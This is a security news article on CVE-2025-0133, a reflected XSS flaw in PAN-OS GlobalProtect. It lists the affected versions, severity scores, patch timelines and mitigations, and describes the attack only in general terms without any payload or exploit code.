Palo Alto Networks has disclosed a reflected cross-site scripting (XSS) vulnerability, identified as CVE-2025-0133, affecting the GlobalProtect gateway and portal features of its PAN-OS software. This flaw allows attackers to execute malicious JavaScript in the browsers of authenticated Captive Portal users when they click on specially crafted links. The vulnerability poses a significant threat to organizations utilizing the Clientless VPN feature. While rated low severity (CVSS Base Score 2.0) under default configurations, the risk elevates to medium (CVSS 5.5) when Clientless VPN is enabled.
Understanding CVE-2025-0133
The vulnerability was identified by researchers at XBOW and enables attackers to create convincing phishing and credential-stealing links that appear to be legitimately hosted on the GlobalProtect portal. The primary attack vector involves social engineering tactics to trick authenticated users into clicking malicious links. Technically classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and CAPEC-591 (Reflected XSS), the flaw’s exploitation allows JavaScript execution within the security context of the user’s authenticated session. While attackers cannot directly modify GlobalProtect configurations or content, they can conduct sophisticated phishing campaigns that circumvent traditional security measures by appearing to originate from trusted GlobalProtect infrastructure.
Affected Products and Versions
According to Palo Alto Networks’ advisory, the vulnerability impacts multiple product versions, including:
– Cloud NGFW (all versions)
– PAN-OS 11.2 (prior to 11.2.7)
– PAN-OS 11.1 (prior to 11.1.11)
– PAN-OS 10.2 (prior to 10.2.17)
– PAN-OS 10.1 (all versions)
Notably, Prisma Access remains unaffected by this vulnerability.
Risk Factors
– Affected Products: Cloud NGFW (all versions), PAN-OS 11.2 (prior to 11.2.7), PAN-OS 11.1 (prior to 11.1.11), PAN-OS 10.2 (prior to 10.2.17), and PAN-OS 10.1 (all versions)
– Impact: Credential theft
– Exploit Prerequisites: Enabled GlobalProtect gateway/portal; user interaction
– CVSS 3.1 Score: 2.0 (default configurations), 5.5 (when Clientless VPN is enabled)
Mitigation Strategies
Organizations running vulnerable versions should implement one of the following mitigations:
1. Upgrade to Patched Versions:
– PAN-OS 11.2: Version 11.2.7 or later (expected June 2025)
– PAN-OS 11.1: Version 11.1.11 or later (expected July 2025)
– PAN-OS 10.2: Version 10.2.17 or later (expected August 2025)
2. Enable Threat Prevention IDs:
– For customers with Threat Prevention subscriptions, enable Threat Prevention IDs 510003 and 510004 (introduced in Applications and Threats content version 8970).
3. Disable Clientless VPN Functionality:
– Consider disabling Clientless VPN functionality entirely to mitigate the risk.
The technical exploit involves specially crafted URLs that, when clicked, execute reflected JavaScript code in the user’s browser session. Security experts recommend user awareness training about suspicious links as an additional layer of defense.
Current Exploitation Status
Palo Alto Networks has stated that they are unaware of any malicious exploitation of this vulnerability in the wild. However, the availability of proof-of-concept code significantly increases the likelihood of active exploitation before patches are widely deployed. Organizations using affected PAN-OS versions should prioritize mitigation based on their Clientless VPN usage and implement appropriate security measures promptly.
